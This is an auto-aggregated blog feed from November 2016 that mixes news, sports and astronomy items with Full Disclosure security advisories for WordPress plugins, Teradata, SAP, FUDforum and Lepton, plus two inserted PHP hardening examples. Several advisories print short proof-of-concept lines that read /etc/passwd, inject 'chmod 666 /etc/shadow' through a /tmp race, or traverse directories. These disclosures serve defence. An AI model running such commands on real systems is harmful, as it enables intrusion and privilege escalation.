
Saturday, November 19, 2016

Gamblers Anonymous Logo

I got to be a contestant to this year's AIGA Command X and had an unbelievable experience. This logo was for the first challeng...

from Google Alert - anonymous http://ift.tt/2ffkbIY
via IFTTT

I have a new follower on Twitter


Shawn Elledge
CEO - Integrated Marketing Association is dedicated to the continued education and support of BtoB and BtoC marketers Next Event Tampa Oct 12-13th
Tampa, FL
https://t.co/jfEJ4KorVR
Following: 9633 - Followers: 14249

November 19, 2016 at 06:38AM via Twitter http://twitter.com/iMarketingAssn

Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Here's some bad news for Android users again. Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers. According to a new report from security rating firm BitSight, the issue is due to a vulnerability in the insecure


from The Hacker News http://ift.tt/2eQDz0l
via IFTTT

[FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin


Source: Gmail -> IFTTT-> Blogger

[FD] Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF


[FD] Cross-Site Scripting in Huge IT Portfolio Gallery WordPress Plugin


[FD] Cross-Site Scripting in Check Email WordPress Plugin


Philadelphia Perigee Full Moon


A supermoon sets over the metropolis of Philadelphia in this twilight snapshot captured on November 14 at 6:21am Eastern Standard Time. Within hours of the Moon's exact full phase, that time does correspond to a lunar perigee or the closest point in the Moon's elliptical orbit around our fair planet. Slightly bigger and brighter at perigee, this Full Moon is still flattened and distorted in appearance by refraction in atmospheric layers along the sight-line near the horizon. Also like more ordinary Full Moons, it shines with the warm color of sunlight. Joined by buildings along the Philadelphia skyline, the perigee full moonlight is reflected in the waters of the mighty Cooper River. via NASA http://ift.tt/2f7q2wQ

Friday, November 18, 2016

Actors Anonymous (2016)


from Google Alert - anonymous http://ift.tt/2fNXQR3
via IFTTT

[FD] Tetris heap spraying: spraying the heap on a budget

L.S.

Over the past decade, heap sprays have become almost synonymous with exploits in web-browsers. After having developed my first practical implementation of a heap spray about ten years ago, I found that the amount of memory needed in some cases was too much for a realistic attack scenario. I needed a new kind of heap spray that did not allocate as much RAM as traditional heap sprays do. So, I developed a heap spray that uses significantly less RAM than a traditional heap spray does. In practice it uses about 33% less in most cases, but theoretically it could be much, much less in ideal situations. This technique requires only the ability to free some of the blocks of memory used to spray the heap during spraying and should otherwise be applicable to every existing implementation.

I wrote an article on my blog that describes the technical details of this technique, you can find it here: http://ift.tt/2fnwpx8

I recently used this technique in a Proof-of-Concept for a vulnerability in Microsoft Edge. You can find details about that vulnerability and the PoC here: http://ift.tt/2gmQXKm

Cheers,
SkyLined


[FD] CVE-2016-3247 Microsoft Edge CTextExtractor::GetBlockText OOB read details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the fourteenth entry in that series. Unfortunately I won't be able to publish everything within one month at the current rate, so I may continue to publish these through December and January.

The below information is available in more detail on my blog at http://ift.tt/2gmQXKm. Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Edge CTextExtractor::GetBlockText OOB read
=====================================
(MS16-104, CVE-2016-3247)

Synopsis


Rumor Central: Orioles interested in free-agent relief pitchers Kevin Jepsen and Anthony Bass - Baltimore Sun (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous


from Google Alert - anonymous http://ift.tt/2g5lg5a
via IFTTT

Ravens: Joe Flacco says Ray Lewis' comments that the QB lacked passion for football were "a little surprising" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details
================
Software: Relevanssi Premium
Version: v1.14.4
Homepage: http://ift.tt/2bvnI2H
Advisory report: http://ift.tt/2g34XIs
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description
================
SQL injection and unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances)

Vulnerability
================
Relevanssi has a search function on the admin side that is not visible in the user interface, however the code is there and can be called. This functionality contains an SQL injection, and this SQL injection can be exploited to pass user controlled values into an unserialization call and run arbitrary code (if there are classes available with particular methods such as __destruct).

If a logged in admin user is tricked into going to an attacker controlled website, JavaScript could be written to make the admin's browser submit the above request, without their knowledge (see 2.3 Social engineering, p.18). Alternatively this attack can be exploited by an attacker with Admin privileges.

Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations.

Mitigations
================
Upgrade to version 1.14.6.1 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:
================
Glyn Wintle

Please visit security.dxw.com for more information.


[FD] Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances) (WordPress plugin)

Details
================
Software: Relevanssi Premium
Version: v1.14.4
Homepage: http://ift.tt/2bvnI2H
Advisory report: http://ift.tt/2faTWDu
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description
================
Unserialization vulnerability in Relevanssi Premium could allow admins to execute arbitrary code (in some circumstances)

Vulnerability
================
If logged in as an admin on any site you can go to settings, Relevanssi Premium, import or export options. This is a text field that accepts a serialised PHP object. It is possible to submit a string that contains an evil encoded object that executes arbitrary code (if there are classes available with particular methods such as __destruct).

Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations.

Mitigations
================
Upgrade to version 1.14.6.1 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2016-10-07: Discovered
2016-11-01: Reported
2016-11-02: Vendor reported fixed
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:
================
Glyn Wintle

Please visit security.dxw.com for more information.


[FD] Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances) (WordPress plugin)

Details
================
Software: Post Indexer
Version: 3.0.6.1
Homepage: http://ift.tt/1dXkFQj
Advisory report: http://ift.tt/2g1TQvQ
CVE: Awaiting assignment
CVSS: 7.6 (High; AV:N/AC:H/Au:N/C:C/I:C/A:C)

Description
================
Unserialisation in Post Indexer could allow man-in-the-middle to execute arbitrary code (in some circumstances)

Vulnerability
================
Twice a day the blog makes an automated unencrypted HTTP request to premium.wpmudev.org and the value that is returned is passed to unserialize().

It is possible for premium.wpmudev.org or any one on the network in a man-in-the-middle position to return a string that contains an evil encoded object that executes arbitrary code (depending on the active plugins and themes).

This code is called twice a day by wp_schedule_event(time(), 'twicedaily', 'wpmudev_scheduled_jobs') (extra/wpmudev-dash-notification.php):

    var $server_url = 'http://ift.tt/2faTuVS'; // line 12
    $url = $this->server_url . '?action=check&un-version=3.3.3&wp=' . urlencode($wp) . '&bcount=' . $blog_count . '&domain=' . urlencode(network_site_url()) . $projects; // line 393
    $response = wp_remote_get($url, $options); // line 400
    $data = $response['body']; // line 402
    $data = unserialize($data); // line 404

There is a class called ProcessLocker in this plugin with an exploitable __destruct method, which could be used as a jumping-off point for attacks using this unserialize() vulnerability (or the use of unserialize() in WordPress core which requires access to the database to exploit).

Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It won’t be possible in all situations.

Mitigations
================
Upgrade to version 3.0.6.2 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2016-11-01: Discovered
2016-11-14: Reported to plugin author via http://ift.tt/1I0mslh
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:
================
Glyn Wintle

Please visit security.dxw.com for more information.
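One way to take the object-injection risk out of an update check like the one in the advisory above, shown as an added example (not Post Indexer or WPMU DEV code). `DemoGadget`, `is_https_url`, `contains_object` and `decode_untrusted` are hypothetical names, the URLs and payloads are constructed, and the `allowed_classes` option assumes PHP 7.0 or later.

```php
<?php
// Added example. All names are hypothetical; payloads below are constructed.

// Stand-in for any plugin or theme class whose destructor has side effects.
class DemoGadget
{
    public static $destructed = 0;
    public $note = 'constructed sample';

    public function __destruct()
    {
        self::$destructed++;
    }
}

// Only fetch update data over TLS, so an on-path host cannot swap the body.
function is_https_url($url)
{
    return strtolower((string) parse_url($url, PHP_URL_SCHEME)) === 'https';
}

// True if the decoded value holds an object anywhere, including the
// __PHP_Incomplete_Class placeholders that unserialize() leaves behind.
function contains_object($value)
{
    if ($value instanceof __PHP_Incomplete_Class || is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Decode a remote body as plain data. Returns an array, or null when the
// body is malformed or carries any serialized object.
function decode_untrusted($body)
{
    // allowed_classes => false: no application class is instantiated, so
    // no __wakeup() or __destruct() from installed code can run.
    $data = @unserialize($body, ['allowed_classes' => false]);
    if (!is_array($data) || contains_object($data)) {
        return null;
    }
    return $data;
}

// Constructed sample bodies: plain data, and data wrapping a DemoGadget.
$benign  = 'a:1:{s:7:"version";s:7:"3.0.6.2";}';
$hostile = 'a:1:{s:1:"x";O:10:"DemoGadget":1:{s:4:"note";s:18:"constructed sample";}}';

var_dump(is_https_url('http://updates.example.test/check'));
var_dump(is_https_url('https://updates.example.test/check'));
var_dump(decode_untrusted($benign));
var_dump(decode_untrusted($hostile));
printf("destructors run after hardened decode: %d\n", DemoGadget::$destructed);

// For contrast, the plain call from the advisory instantiates the class,
// and its destructor runs as soon as the value is released.
$legacy = unserialize($hostile);
unset($legacy);
printf("destructors run after plain unserialize(): %d\n", DemoGadget::$destructed);
```

Where the server side can change as well, a format with no object support, such as JSON, removes the problem at the source.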


[FD] SQL Injection in Post Indexer allows super admins to read the contents of the database (WordPress plugin)

Details
================
Software: Post Indexer
Version: 3.0.6.1
Homepage: http://ift.tt/1dXkFQj
Advisory report: http://ift.tt/2g1Rqxb
CVE: Awaiting assignment
CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description
================
SQL Injection in Post Indexer allows super admins to read the contents of the database

Vulnerability
================
Post Indexer does not use prepared queries in many cases and in some of its database calls it uses backticks (`). These are not automatically escaped by WordPress, thus leading to the possibility of SQL injection.

In other places in the code it simply takes user controlled values and adds them to SQL queries. An example of this is remove_post_older_than:

    // classes/class.model.php line 589
    function remove_posts_older_than( $unit, $period ) {
      // ...
      $sql = $this->db->prepare( "SELECT BLOG_ID, ID FROM {$this->network_posts} WHERE DATE_ADD(post_date, INTERVAL %d " . $period . ") < CURRENT_DATE() LIMIT %d", $unit, PI_CRON_TIDY_DELETE_LIMIT );
      $posts = $this->db->get_results( $sql );
      // ...
    }

The value of $period is user-controlled and could easily be replaced with SQL:

    // classes/cron.postindexerrebuild.php line 310
    function process_tidy_agedposts($DEBUG = false) {
      // ...
      // The default is to remove posts from the index when they are over a year old
      $agedposts = get_site_option( 'postindexer_agedposts', array( 'agedunit' => 1, 'agedperiod' => 'year' ) );
      // ...
      $this->model->remove_posts_older_than( $agedposts['agedunit'], $agedposts['agedperiod'] );
      // ...
    }

To exploit this vulnerability you need to be a super admin.

Proof of concept
================

Mitigations
================
Upgrade to version 3.0.6.2 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2016-11-01: Discovered
2016-11-14: Reported to plugin author via http://ift.tt/1I0mslh
2016-11-14: Plugin author responded
2016-11-17: Confirmed that version 3.0.6.2 fixes the issue
2016-11-17: Requested CVE
2016-11-17: Advisory published

Discovered by dxw:
================
Glyn Wintle

Please visit security.dxw.com for more information.
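A `%d` placeholder can only bind a value, so the interval keyword in the query quoted in the advisory above has to come from the code rather than from the stored option. An allow-list is one way to do that, shown here as an added example (not Post Indexer code); `ALLOWED_PERIODS`, `interval_keyword`, `tidy_query` and the table name are hypothetical, and the option values are constructed.

```php
<?php
// Added example. Function names, table name and sample values are hypothetical.

// MySQL interval units this feature needs, keyed by the stored option value.
const ALLOWED_PERIODS = [
    'day'   => 'DAY',
    'week'  => 'WEEK',
    'month' => 'MONTH',
    'year'  => 'YEAR',
];

// Map the stored option to a keyword taken from our own table, never from
// the input itself. Anything that is not an exact known unit is refused.
function interval_keyword($period)
{
    $key = is_string($period) ? strtolower(trim($period)) : '';
    if (!array_key_exists($key, ALLOWED_PERIODS)) {
        throw new InvalidArgumentException('unsupported interval unit');
    }
    return ALLOWED_PERIODS[$key];
}

// Build the template and arguments for a prepare()-style API: numbers travel
// as %d placeholders, the unit is an allow-listed keyword. $table is assumed
// to be a fixed, code-supplied identifier, not user input.
function tidy_query($table, $unit, $period, $limit)
{
    $unit = filter_var($unit, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($unit === false) {
        throw new InvalidArgumentException('interval count must be a positive integer');
    }
    $sql = "SELECT BLOG_ID, ID FROM {$table} "
         . 'WHERE DATE_ADD(post_date, INTERVAL %d ' . interval_keyword($period) . ') '
         . '< CURRENT_DATE() LIMIT %d';
    return [$sql, [$unit, (int) $limit]];
}

// Constructed option values: two valid, two that must be refused.
$samples = [
    ['agedunit' => 1,        'agedperiod' => 'year'],
    ['agedunit' => '6',      'agedperiod' => 'Month'],
    ['agedunit' => 1,        'agedperiod' => 'year) -- not a unit'],
    ['agedunit' => '1 OR 1', 'agedperiod' => 'day'],
];

foreach ($samples as $opt) {
    try {
        list($sql, $args) = tidy_query('demo_network_posts', $opt['agedunit'], $opt['agedperiod'], 50);
        echo 'OK   ', $sql, ' ', json_encode($args), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'DENY ', json_encode($opt), ': ', $e->getMessage(), "\n";
    }
}
```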


[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: http://ift.tt/1m6upH7
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact

Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP).

Vulnerability: The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges.

    $ grep -n "/tmp" studioexpressinstall
    33:ASKDIRFILE=/tmp/sqlajeaskdir
    41:DEF_TRACEFILE=/tmp/studioexinstall.log
    44:TMP=/tmp
    72:SQLAJEINPUTS=/tmp/studioexinputs
    90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
    103:SQLAJEINSTALL=/tmp/studioexpressinstall
    136: java -version > "/tmp/javaver" 2>&1
    137: verstring=`grep "java version" /tmp/javaver`
    143: jre64b=`grep "64-Bit" /tmp/javaver`
    212:rm -f /tmp/javaver
    341: tmptracefile=/tmp/studioexinstall.log.tmp #Temporary trace file.
    588:touch /tmp/checkstudioexinstall
    603:rm -f /tmp/checkstudioexinstall
    604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490

Exploit Code:

    $ ln -s /tmp/javaver /etc/passed

Advisory: http://ift.tt/2eTLGEL


[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: http://ift.tt/2eGJjoM
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact

Description: Teradata is a relational database, they provide a Virtual Machine image for developers and community use.

Vulnerability: Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp may lead to elevated code execution.

In /opt/teradata/gsctools/bin/t2a.pl

    320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr >/dev/null 2>&1` ;

If a regular user controls /tmp/t2a.pl.get_profile.scr before the person executing this script creates it they can inject commands to be executed as that user. For example:

    $ while(true) do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; done

If root or any other account runs that .pl script I see these files being created in /tmp [C] -rw-


[FD] [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5
Vendor URL: http://SAP.com
Bugs: Directory traversal
Sent: 04.12.2015
Reported: 05.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 09.08.2016
Reference: SAP Security Note 2280371
Author: Mathieu Geli (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability
Advisory ID: [ERPSCAN-16-032]
Risk: high
Advisory URL: http://ift.tt/2gpI97g
Date published: 11.11.2016
Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Directory traversal
Impact: read file from system
Remotely Exploitable: yes
Locally Exploitable: yes

CVSS Information
CVSS Base Score v3: 3.4 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range): Adjacent (A)
AC : Attack Complexity (Required attack complexity): Low (L)
PR : Privileges Required (Level of privileges needed to exploit): High (H)
UI : User Interaction (Required user participation): None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component): Changed (C)
C : Impact to Confidentiality: Low (L)
I : Impact to Integrity: None (N)
A : Impact to Availability: None (N)

3. VULNERABILITY DESCRIPTION

An authenticated user can disclose file content outside of the JVM through the SAP Telnet Console service.

4. VULNERABLE PACKAGES

J2EE ENGINE SERVERCORE 7.10
J2EE ENGINE SERVERCORE 7.11
J2EE ENGINE SERVERCORE 7.20
J2EE ENGINE SERVERCORE 7.30
J2EE ENGINE SERVERCORE 7.31
J2EE ENGINE SERVERCORE 7.40
J2EE ENGINE SERVERCORE 7.50

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2280371

6. AUTHOR

Mathieu Geli (ERPScan)

7. TECHNICAL DESCRIPTION

SAP Netweaver Telnet Console File Disclosure via the GREP command of the SYSTEM admin group.

7.1. Proof of Concept

    GREP ":" /etc/passwd
    at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
    bin:x:1:1:bin:/bin:/bin/bash
    daemon:x:2:2:Daemon:/sbin:/bin/bash
    [...]

8. REPORT TIMELINE

Sent: 04.12.2015
Reported: 05.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 09.08.2016

9. REFERENCES

http://ift.tt/2gpI97g

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches.

ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and business security and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe.

Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan


[FD] [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET

Application: SAP NetWeaver AS ABAP
Versions Affected: SAP NetWeaver AS ABAP 7.4
Vendor URL: http://SAP.com
Bugs: Directory traversal
Sent: 22.04.2016
Reported: 23.04.2016
Vendor response: 23.04.2016
Date of Public Advisory: 09.08.2016
Reference: SAP Security Note 2312966
Author: Daria Prosochkina (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET
Advisory ID: [ERPSCAN-16-031]
Risk: high
Advisory URL: http://ift.tt/2gpIB5s
Date published: 11.11.2016
Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Directory traversal
Impact: read file from system
Remotely Exploitable: yes
Locally Exploitable: yes

CVSS Information
CVSS Base Score v3: 4.3 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range): Network (N)
AC : Attack Complexity (Required attack complexity): Low (L)
PR : Privileges Required (Level of privileges needed to exploit): Low (L)
UI : User Interaction (Required user participation): None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component): Unchanged (U)
C : Impact to Confidentiality: Low (L)
I : Impact to Integrity: None (N)
A : Impact to Availability: None (N)

3. VULNERABILITY DESCRIPTION

The code provides access to the file specified after the READ DATASET statement. The variable transmitted to the input of the statement is entered in it by user input. Thus, the user can access the files stored on the operating system. This vulnerability is called a Directory Traversal. The attack is possible if the application does not check the user data and does not delete special characters used for a directory traversal attack from the variable, in which the filename is passed. As a result, an attacker can read data from all files, to which the application has access. To discover this vulnerability, data flow analysis and other unique techniques are used.

4. VULNERABLE PACKAGES

SAP_ABA 700
SAP_ABA 701
SAP_ABA 702
SAP_ABA 710
SAP_ABA 711
SAP_ABA 730
SAP_ABA 731
SAP_ABA 740
SAP_ABA 750
SAP_ABA 751
SAP_ABA 75A
SAP_ABA 75B

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2312966

6. AUTHOR

Daria Prosochkina (ERPScan)

7. TECHNICAL DESCRIPTION

Attacker can read any file from OS with use BUPA_BIP_FILE_IMPORT program. Filename used in statement READ DATASET (line 428) is entered in this statement by user input. User can pass to input arbitrary filepath, for example /etc/passwd. As a result of execution of the BUPA_BIP_FILE_IMPORT program, data from /etc/passwd will be written in P_FLEN variable in hex format.

Vulnerable code

    426. p_flen = 0.
    427. DO.
    428. READ DATASET p_ifilea INTO lw.
    429.* Exit conditions for accessing in a loop
    430. IF sy-subrc NE 0. EXIT. ENDIF.
    431. APPEND lw TO p_itab .
    432.
    433. p_flen = p_flen + XSTRLEN( lw-d ) .
    434. ENDDO.

8. REPORT TIMELINE

Sent: 22.04.2016
Reported: 23.04.2016
Vendor response: 23.04.2016
Date of Public Advisory: 09.08.2016

9. REFERENCES

http://ift.tt/2gpIB5s

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies.


[FD] FUDforum 3.0.6: LFI

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://ift.tt/Uef24o
Vulnerability Type: LFI
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description: The "file" parameter of the hlplist.php script is vulnerable to directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:

    http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2g325sF


[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://ift.tt/Uef24o
Vulnerability Type: XSS, Login CSRF
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to multiple persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable to persistent XSS.

Proof of Concept: Send a PM to a user. Add an attachment, where the filename is: '">.jpg When the recipient views the PM, the injected code will be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to persistent XSS.

Proof of Concept: Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading to persistent XSS.

Proof of Concept: Visit http://localhost/fudforum/index.php?t=register as signature, use '"></ textarea> The injected code is either executed when the user themselves edits their profile - which may be exploited via login CSRF - or when an admin visits the edit profile page located here: http://localhost/fudforum/index.php?t=register&mod_id=6&&SQ=1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDForum does not have any CSRF protection. The impact of this is low, but an attacker might get a victim to disclose sensitive information by using CSRF to log the victim into an attacker-controlled account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the user area.

Proof of Concept:

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public

Blog Reference: http://ift.tt/2fnuCrG

Source: Gmail -> IFTTT-> Blogger

[FD] Lepton 2.2.2: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://ift.tt/2fLwZoM important-lepton-2.3.0-101.php
Vendor Website: http://ift.tt/2g2ZQb7
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to code execution as it is possible to upload files with dangerous type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as well as a server-side extension check. The server-side check can be bypassed by including a valid extension before the desired extension, leading to code execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=099c871bbf640f2f91d2az1472132032 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: lep9131sessionid=8bgkd5rae5nhbn0jaac8jpkpc5
Connection: close
Content-Type: multipart/form-data; boundary

